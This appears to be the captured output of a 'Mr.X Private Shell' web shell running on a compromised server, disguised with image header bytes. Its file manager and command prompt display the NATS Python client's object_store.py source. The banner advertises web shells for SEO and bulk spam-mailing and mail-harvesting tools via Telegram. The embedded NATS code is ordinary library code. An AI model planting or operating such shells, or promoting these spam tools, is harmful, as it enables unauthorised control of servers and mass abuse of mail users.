����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# Copyright 2021-2023 The NATS Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import asyncio
import base64
import io
import json
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from hashlib import sha256
from typing import TYPE_CHECKING, List, Optional, Union

import nats.errors
from nats.js import api
from nats.js.errors import (
    BadObjectMetaError,
    DigestMismatchError,
    LinkIsABucketError,
    NotFoundError,
    ObjectAlreadyExists,
    ObjectDeletedError,
    ObjectNotFoundError,
)
from nats.js.kv import MSG_ROLLUP_SUBJECT, StopIterSentinel

VALID_BUCKET_RE = re.compile(r"^[a-zA-Z0-9_-]+$")
VALID_KEY_RE = re.compile(r"^[-/_=\.a-zA-Z0-9]+$")

if TYPE_CHECKING:
    from nats.js import JetStreamContext

OBJ_STREAM_TEMPLATE = "OBJ_{bucket}"
OBJ_ALL_CHUNKS_PRE_TEMPLATE = "$O.{bucket}.C.>"
OBJ_ALL_META_PRE_TEMPLATE = "$O.{bucket}.M.>"
OBJ_CHUNKS_PRE_TEMPLATE = "$O.{bucket}.C.{obj}"
OBJ_META_PRE_TEMPLATE = "$O.{bucket}.M.{obj}"
OBJ_NO_PENDING = "0"
OBJ_DEFAULT_CHUNK_SIZE = 128 * 1024  # 128k
OBJ_DIGEST_TYPE = "SHA-256="
OBJ_DIGEST_TEMPLATE = OBJ_DIGEST_TYPE + "{digest}"


class ObjectStore:
    """
    ObjectStore uses the JetStream ObjectStore functionality.

    ::
    """

    @dataclass
    class ObjectResult:
        """
        ObjectResult is the result returned from the ObjectStore in JetStream.
        """

        info: api.ObjectInfo
        data: Optional[bytes] = bytes()

    @dataclass(frozen=True)
    class ObjectStoreStatus:
        """
        ObjectStoreStatus is the status of a ObjectStore bucket.
        """

        stream_info: api.StreamInfo
        bucket: str

        @property
        def description(self) -> Optional[str]:
            """
            description is the description supplied when creating the bucket.
            """
            return self.stream_info.config.description

        @property
        def ttl(self) -> Optional[float]:
            """
            ttl returns the max age in seconds.
            """
            if self.stream_info.config.max_age is None:
                return None
            return self.stream_info.config.max_age

        @property
        def storage_type(self) -> Optional[api.StorageType]:
            """
            storage indicates the underlying JetStream storage technology used to store data.
            """
            return self.stream_info.config.storage

        @property
        def replicas(self) -> Optional[int]:
            """
            replicas indicates how many storage replicas are kept for the data in the bucket.
            """
            return self.stream_info.config.num_replicas

        @property
        def sealed(self) -> bool:
            """
            sealed indicates the stream is sealed and cannot be modified in any way.
            """
            return self.stream_info.config.sealed

        @property
        def size(self) -> int:
            """
            size is the combined size of all data in the bucket including metadata, in bytes.
            """
            return self.stream_info.state.bytes

    def __init__(
        self,
        name: str,
        stream: str,
        js: "JetStreamContext",
    ) -> None:
        self._name = name
        self._stream = stream
        self._js = js

    async def get_info(
        self,
        name: str,
        show_deleted: Optional[bool] = False,
    ) -> api.ObjectInfo:
        """
        get_info will retrieve the current information for the object.
        """
        obj = name

        meta = OBJ_META_PRE_TEMPLATE.format(
            bucket=self._name,
            obj=base64.urlsafe_b64encode(bytes(obj, "utf-8")).decode(),
        )
        stream = OBJ_STREAM_TEMPLATE.format(bucket=self._name)

        msg = None
        try:
            msg = await self._js.get_last_msg(stream, meta)
        except NotFoundError:
            raise ObjectNotFoundError

        data = None
        if msg.data:
            data = msg.data

        try:
            info = api.ObjectInfo.from_response(json.loads(data))
        except Exception as e:
            raise BadObjectMetaError from e

        if (not show_deleted) and info.deleted:
            raise ObjectNotFoundError

        # TODO: Uncomment below when time is added to RawStreamMsg.
        # info.mtime = m.time

        return info

    async def get(
        self,
        name: str,
        writeinto: Optional[io.BufferedIOBase] = None,
        show_deleted: Optional[bool] = False,
    ) -> ObjectResult:
        """
        get will pull the object from the underlying stream.
        """
        obj = name

        # Grab meta info.
        info = await self.get_info(obj, show_deleted)

        if info.nuid is None or info.nuid == "":
            raise BadObjectMetaError

        # Check for object links.If single objects we do a pass through.
        if info.is_link():
            if info.options.link.name is None or info.options.link.name == "":
                raise LinkIsABucketError
            lobs = await self._js.object_store(info.options.link.bucket)
            return await lobs.get(info.options.link.name)

        result = self.ObjectResult(info=info)

        if info.size == 0:
            return result

        chunk_subj = OBJ_CHUNKS_PRE_TEMPLATE.format(bucket=self._name, obj=info.nuid)
        sub = await self._js.subscribe(subject=chunk_subj, ordered_consumer=True)

        h = sha256()

        executor = None
        executor_fn = None
        if writeinto:
            executor = asyncio.get_running_loop().run_in_executor
            if hasattr(writeinto, "buffer"):
                executor_fn = writeinto.buffer.write
            else:
                executor_fn = writeinto.write

        async for msg in sub._message_iterator:
            tokens = msg._get_metadata_fields(msg.reply)

            if executor:
                await executor(None, executor_fn, msg.data)
            else:
                result.data += msg.data
            h.update(msg.data)

            # Check if we are done.
            if tokens[8] == OBJ_NO_PENDING:
                await sub.unsubscribe()

                # Make sure the digest matches.
                sha = h.digest()
                digest_str = info.digest.replace(OBJ_DIGEST_TYPE, "").replace(OBJ_DIGEST_TYPE.upper(), "")
                rsha = base64.urlsafe_b64decode(digest_str)
                if not sha == rsha:
                    raise DigestMismatchError

        return result

    async def put(
        self,
        name: str,
        data: Union[str, bytes, io.BufferedIOBase],
        meta: Optional[api.ObjectMeta] = None,
    ) -> api.ObjectInfo:
        """
        put will place the contents from the reader into this object-store.
        """
        if meta is None:
            meta = api.ObjectMeta(name=name)
        elif len(name) > 0:
            meta.name = name

        if meta.options is None:
            meta.options = api.ObjectMetaOptions(
                max_chunk_size=OBJ_DEFAULT_CHUNK_SIZE,
            )

        obj = meta.name
        einfo = None

        # Create the new nuid so chunks go on a new subject if the name is reused.
        newnuid = self._js._nc._nuid.next()

        # Create a random subject prefixed with the object stream name.
        chunk_subj = OBJ_CHUNKS_PRE_TEMPLATE.format(bucket=self._name, obj=newnuid.decode())

        # Grab existing meta info (einfo). Ok to be found or not found, any other error is a problem.
        # Chunks on the old nuid can be cleaned up at the end.
        try:
            einfo = await self.get_info(meta.name)
        except NotFoundError:
            pass

        # Normalize based on type but treat all as readers.
        executor = None
        if isinstance(data, str):
            data = io.BytesIO(data.encode())
        elif isinstance(data, bytes):
            data = io.BytesIO(data)
        elif hasattr(data, "readinto") or isinstance(data, io.BufferedIOBase):
            # Need to delegate to a threaded executor to avoid blocking.
            executor = asyncio.get_running_loop().run_in_executor
        elif hasattr(data, "buffer") or isinstance(data, io.TextIOWrapper):
            data = data.buffer
        else:
            raise TypeError("nats: invalid type for object store")

        info = api.ObjectInfo(
            name=meta.name,
            description=meta.description,
            headers=meta.headers,
            options=meta.options,
            bucket=self._name,
            nuid=newnuid.decode(),
            size=0,
            chunks=0,
            mtime=datetime.now(timezone.utc).isoformat(),
        )
        h = sha256()
        chunk = bytearray(meta.options.max_chunk_size)
        sent = 0
        total = 0

        while True:
            try:
                n = None
                if executor:
                    n = await executor(None, data.readinto, chunk)
                else:
                    n = data.readinto(chunk)

                if n == 0:
                    break
                payload = chunk[:n]
                h.update(payload)
                await self._js.publish(chunk_subj, payload)
                sent += 1
                total += n
            except Exception as err:
                await self._js.purge_stream(self._stream, subject=chunk_subj)
                raise err

        sha = h.digest()
        info.size = total
        info.chunks = sent
        info.digest = OBJ_DIGEST_TEMPLATE.format(digest=base64.urlsafe_b64encode(sha).decode())

        # Prepare the meta message.
        meta_subj = OBJ_META_PRE_TEMPLATE.format(
            bucket=self._name,
            obj=base64.urlsafe_b64encode(bytes(obj, "utf-8")).decode(),
        )
        # Publish the meta message.
        try:
            await self._js.publish(
                meta_subj,
                json.dumps(info.as_dict()).encode(),
                headers={api.Header.ROLLUP: MSG_ROLLUP_SUBJECT},
            )
        except Exception as err:
            await self._js.purge_stream(self._stream, subject=chunk_subj)
            raise err

        # NOTE: This time is not actually the correct time.
        info.mtime = datetime.now(timezone.utc).isoformat()

        # Delete any original chunks.
        if einfo is not None and not einfo.deleted:
            chunk_subj = OBJ_CHUNKS_PRE_TEMPLATE.format(bucket=self._name, obj=einfo.nuid)
            await self._js.purge_stream(self._stream, subject=chunk_subj)

        return info

    async def status(self) -> ObjectStoreStatus:
        """
        status retrieves runtime status about a bucket.
        """
        info = await self._js.stream_info(self._stream)
        status = self.ObjectStoreStatus(stream_info=info, bucket=self._name)
        return status

    async def seal(self):
        """
        seal will seal the object store, no further modifications will be allowed.
        """
        info = await self._js.stream_info(self._stream)
        config = info.config
        config.sealed = True
        await self._js.update_stream(config)

    async def update_meta(
        self,
        name: str,
        meta: api.ObjectMeta,
    ):
        """
        update_meta will place the contents from the reader into this object-store.
        """
        info = None
        try:
            info = await self.get_info(name)
        except ObjectNotFoundError:
            raise ObjectDeletedError

        # Can change it only if it has been deleted.
        if name != meta.name:
            einfo = await self.get_info(name, show_deleted=True)
            if not einfo.deleted:
                raise ObjectAlreadyExists

        info.name = meta.name
        info.description = meta.description
        info.headers = meta.headers

        # Prepare the meta message.
        meta_subj = OBJ_META_PRE_TEMPLATE.format(
            bucket=self._name,
            obj=base64.urlsafe_b64encode(bytes(name, "utf-8")).decode(),
        )
        # Publish the meta message.
        try:
            await self._js.publish(
                meta_subj,
                json.dumps(info.as_dict()).encode(),
                headers={api.Header.ROLLUP: MSG_ROLLUP_SUBJECT},
            )
        except Exception as err:
            raise err

        # If the name changed, then need to store the meta under the new name.
        if name != meta.name:
            # TODO: purge the stream
            await self._js.purge_stream(self._stream, subject=meta_subj)

    class ObjectWatcher:
        STOP_ITER = StopIterSentinel()

        def __init__(self, js):
            self._js = js
            self._updates: asyncio.Queue[Union[api.ObjectInfo, None, StopIterSentinel]] = asyncio.Queue(maxsize=256)
            self._sub = None
            self._pending: Optional[int] = None

            # init done means that the nil marker has been sent,
            # once this is sent it won't be sent anymore.
            self._init_done = False

        async def stop(self):
            """
            stop will stop this watcher.
            """
            await self._sub.unsubscribe()

        async def updates(self, timeout=5.0):
            """
            updates fetches the next update from a watcher.
            """
            try:
                return await asyncio.wait_for(self._updates.get(), timeout)
            except asyncio.TimeoutError:
                raise nats.errors.TimeoutError

        def __aiter__(self):
            return self

        async def __anext__(self):
            while True:
                entry = await self._updates.get()

                if isinstance(entry, StopIterSentinel):
                    raise StopAsyncIteration
                return entry

    async def watch(
        self,
        ignore_deletes=False,
        include_history=False,
        meta_only=False,
    ) -> ObjectWatcher:
        """
        watch for changes in the underlying store and receive meta information updates.
        """
        all_meta = OBJ_ALL_META_PRE_TEMPLATE.format(
            bucket=self._name,
        )
        watcher = ObjectStore.ObjectWatcher(self)

        async def watch_updates(msg):
            meta = msg.metadata
            info = api.ObjectInfo.from_response(json.loads(msg.data))

            if (not ignore_deletes) or (not info.deleted):
                await watcher._updates.put(info)

            # When there are no more updates send an empty marker
            # to signal that it is done, this will unblock iterators
            if (not watcher._init_done) and meta.num_pending == 0:
                watcher._init_done = True
                await watcher._updates.put(None)

        try:
            await self._js.get_last_msg(self._stream, all_meta)
        except NotFoundError:
            watcher._init_done = True
            await watcher._updates.put(None)

        deliver_policy = None
        if not include_history:
            deliver_policy = api.DeliverPolicy.LAST_PER_SUBJECT

        watcher._sub = await self._js.subscribe(
            all_meta,
            cb=watch_updates,
            ordered_consumer=True,
            deliver_policy=deliver_policy,
        )
        await asyncio.sleep(0)

        return watcher

    async def delete(self, name: str) -> ObjectResult:
        """
        delete will delete the object.
        """
        obj = name

        # Grab meta info.
        info = await self.get_info(obj)

        if info.nuid is None or info.nuid == "":
            raise BadObjectMetaError

        # Purge chunks for the object.
        chunk_subj = OBJ_CHUNKS_PRE_TEMPLATE.format(bucket=self._name, obj=info.nuid)

        # Reset meta values.
        info.deleted = True
        info.size = 0
        info.chunks = 0
        info.digest = ""
        info.mtime = ""

        # Prepare the meta message.
        meta_subj = OBJ_META_PRE_TEMPLATE.format(
            bucket=self._name,
            obj=base64.urlsafe_b64encode(bytes(obj, "utf-8")).decode(),
        )
        # Publish the meta message.
        try:
            await self._js.publish(
                meta_subj,
                json.dumps(info.as_dict()).encode(),
                headers={api.Header.ROLLUP: MSG_ROLLUP_SUBJECT},
            )
        finally:
            await self._js.purge_stream(self._stream, subject=chunk_subj)

    async def list(
        self,
        ignore_deletes=False,
    ) -> List[api.ObjectInfo]:
        """
        list will list all the objects in this store.
        """
        watcher = await self.watch(ignore_deletes=ignore_deletes)
        entries = []

        async for entry in watcher:
            # None entry is used to signal that there is no more info.
            if not entry:
                break
            entries.append(entry)

        await watcher.stop()

        if not entries:
            raise NotFoundError

        return entries

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 765 B 0644
api.py File 27.24 KB 0644
client.py File 53.2 KB 0644
errors.py File 7.36 KB 0644
kv.py File 17.86 KB 0644
manager.py File 14.8 KB 0644
object_store.py File 17.04 KB 0644